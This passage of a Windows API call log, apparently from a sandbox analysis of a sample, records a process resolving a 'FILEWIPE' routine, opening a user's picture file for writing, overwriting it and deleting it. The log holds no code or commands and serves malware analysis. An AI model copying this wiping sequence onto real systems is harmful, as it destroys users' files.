dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.543] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.543] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0041.543] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.543] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.543] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.544] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.544] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.544] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.544] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0041.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.544] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.544] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.544] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e07f0, ftCreationTime.dwHighDateTime=0x1d5c255, ftLastAccessTime.dwLowDateTime=0xd28ab6b0, ftLastAccessTime.dwHighDateTime=0x1d5c40e, ftLastWriteTime.dwLowDateTime=0xd28ab6b0, ftLastWriteTime.dwHighDateTime=0x1d5c40e, nFileSizeHigh=0x0, nFileSizeLow=0xc15, dwReserved0=0x0, dwReserved1=0x777648, cFileName="RyGEMqdNb-RYBEky Y-C.gif", cAlternateFileName="RYGEMQ~1.GIF")) returned 0x7c2100 [0041.545] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.545] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.545] CharLowerBuffW (in: lpsz="byte[3093]", cchLength=0xa | out: lpsz="byte[3093]") returned 0xa [0041.545] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.545] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.545] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.545] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.545] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.545] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.546] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.546] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.546] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.547] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.547] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rygemqdnb-rybeky y-c.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0041.548] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.548] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.548] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.548] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.548] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.548] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.548] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.549] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.549] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.549] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.549] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.549] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", lpFilePart=0x0) returned 0x3f [0041.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e07f0, ftCreationTime.dwHighDateTime=0x1d5c255, ftLastAccessTime.dwLowDateTime=0xd28ab6b0, ftLastAccessTime.dwHighDateTime=0x1d5c40e, ftLastWriteTime.dwLowDateTime=0x1877f220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xc15, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="RyGEMqdNb-RYBEky Y-C.gif", cAlternateFileName="RYGEMQ~1.GIF")) returned 0x7c2100 [0041.549] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rygemqdnb-rybeky y-c.gif")) returned 1 [0041.551] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e07f0, ftCreationTime.dwHighDateTime=0x1d5c255, ftLastAccessTime.dwLowDateTime=0xd28ab6b0, ftLastAccessTime.dwHighDateTime=0x1d5c40e, ftLastWriteTime.dwLowDateTime=0x1877f220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xc15, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="RyGEMqdNb-RYBEky Y-C.gif", cAlternateFileName="RYGEMQ~1.GIF")) returned 0 [0041.551] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.552] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 1 [0041.552] TranslateMessage (lpMsg=0x6aed6c) returned 0 [0041.552] DispatchMessageW (lpMsg=0x6aed6c) returned 0x0 [0041.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.552] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae408) returned 1 [0041.553] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0041.553] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0041.553] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0041.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0041.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.555] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0041.556] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af598 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.556] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.557] 